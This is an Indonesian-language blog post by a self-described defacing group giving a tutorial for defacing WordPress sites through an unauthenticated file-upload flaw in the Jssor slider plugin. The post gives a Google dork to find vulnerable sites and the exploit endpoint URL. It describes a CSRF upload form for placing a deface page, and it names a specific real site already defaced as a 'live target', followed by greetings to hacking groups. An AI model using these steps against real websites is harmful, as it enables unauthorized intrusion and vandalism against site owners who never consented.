Cara Proof Metode Json Slider Upload File Vulnerability + Live Target | LXI - 2019
Yow Halo Exploiter, kali ini saya sebagai Admin The_N4R4MT akan membagikan tutorial deface metode Wordpress Json Slider Upload File Vulnerability, caranya simpel, ok langsung saja ke intinya.
CSRF To HTML Upload Filenya :
Oke selanjutnya langsung saja kita ubah URLnya menjadi akses ke Sc pepes kita tadi contoh :
Wookey Webnya sudah kita pepes
Oke bahan yang kalian butuhkan :
Dork :
inurl:/wp-content/jssor-slider/jssor-uploads/
Exploit :
wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
CSRF To HTML Upload Filenya :
->>Klik Ini! <<-
Akses File :
wp-content/jssor-slider/jssor-uploads/ScDefaceKamu.htmlLive Target :
Yang pertama kalian lakukan yaitu dorking di google lalu pilih target atau pilih live target diatas
Selanjutnya masukan exploit yang sudah saya sediakan contoh :
https://site.dom/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
Nah jika seperti ini maka vuln,dan langsung kita copy url lalu tempel ke sc CSRFnya
Lalu kita simpan dan buka file tadi ke chrome
Lalu upload file Sc pepes kalian
Jika bisa maka nantinya akan sama persis seperti web yang sudah kalian exploit tadi
http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/anony.html
Dan langsung saja dor!
Sekian saja menurut saya pertemuan kali ini,kami sebagai :
-The_N4R4NT
-RebelSuck
Greetz :
-LolzSec X-Ploit Indo Official
-Satanic Devil Officiial
-Malang Grey Hat
-Malang Cyber Army
-Bangkalan X-Ploit
Menucapka maaf jika kami melontarkan kata yang semungkinya masuk kedalam hati para mastah,Sekian Saja Wassalamualaikum Wr.Wb.
Whatsapp The_N4R4NT :
Instagram :
0 Response to "Cara Proof Metode Json Slider Upload File Vulnerability + Live Target | LXI - 2019"
Post a Comment